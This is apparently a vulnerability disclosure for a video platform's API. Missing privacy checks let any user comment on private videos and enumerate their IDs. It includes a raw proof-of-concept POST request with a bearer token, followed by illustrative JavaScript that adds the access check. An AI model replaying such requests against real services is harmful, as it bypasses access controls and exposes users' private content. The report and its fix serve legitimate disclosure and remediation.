The app doesn’t check the status of the video when making data changes. Normal users can create new comments or reply to comments on private videos.
POST /api/v1/videos/53328/comment-threads HTTP/2
Host: p.lu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer d8163b600e3de89c6039af034a94bd3898d68825
Content-Type: application/json
Content-Length: 16
Origin: https://p.lu
Referer: https://p.lu/w/87rzixn5tGiFBA5iojv9RP
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"text":"hello"}
send comment: https://drive.google.com/file/d/1qkNAeu5vSsdA7-PeWszHbIngiiLzk9u_/view?usp=sharing
comment in private video: https://drive.google.com/file/d/1jdIuH75caNHvTZob7vBtsvKkVKbz2pcF/view?usp=sharing
Attackers can create comments on private videos. This can be abused to list the IDs of private videos based on the response to the API call.
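
The missing check and one way to add it, as an added example that is not part of the original report and is not the application's own code. The in-memory video store, the function names and the owner-only access rule are assumptions made for illustration.

```javascript
// Hypothetical in-memory model (constructed sample data, not the app's schema).
const videos = new Map([
  [1, { id: 1, ownerId: 10, privacy: 'public' }],
  [2, { id: 2, ownerId: 10, privacy: 'private' }],
]);
const comments = [];

// Assumed rule: a private video is visible to its owner only.
function canAccessVideo(user, video) {
  return video.privacy === 'public' || user.id === video.ownerId;
}

// Behaviour described in the report: only the existence of the video is
// checked, so any authenticated user can write to a private video, and the
// status code tells them whether an id exists.
function createCommentUnchecked(user, videoId, text) {
  const video = videos.get(videoId);
  if (!video) return { status: 404, body: { error: 'Video not found' } };
  comments.push({ videoId, authorId: user.id, text });
  return { status: 200, body: { text } };
}

// Hardened: the same access rule used for reading the video gates the write.
// "Not found" and "not allowed" share one response, so the endpoint no longer
// distinguishes a private video from an id that does not exist.
function createCommentChecked(user, videoId, text) {
  const video = videos.get(videoId);
  if (!video || !canAccessVideo(user, video)) {
    return { status: 404, body: { error: 'Video not found' } };
  }
  comments.push({ videoId, authorId: user.id, text });
  return { status: 200, body: { text } };
}

// Count stored comments for a video (used to confirm nothing was written).
function commentCount(videoId) {
  return comments.filter((c) => c.videoId === videoId).length;
}
```

The same access check belongs on every route that modifies data under a video (replies, ratings, and so on), not only on the read path.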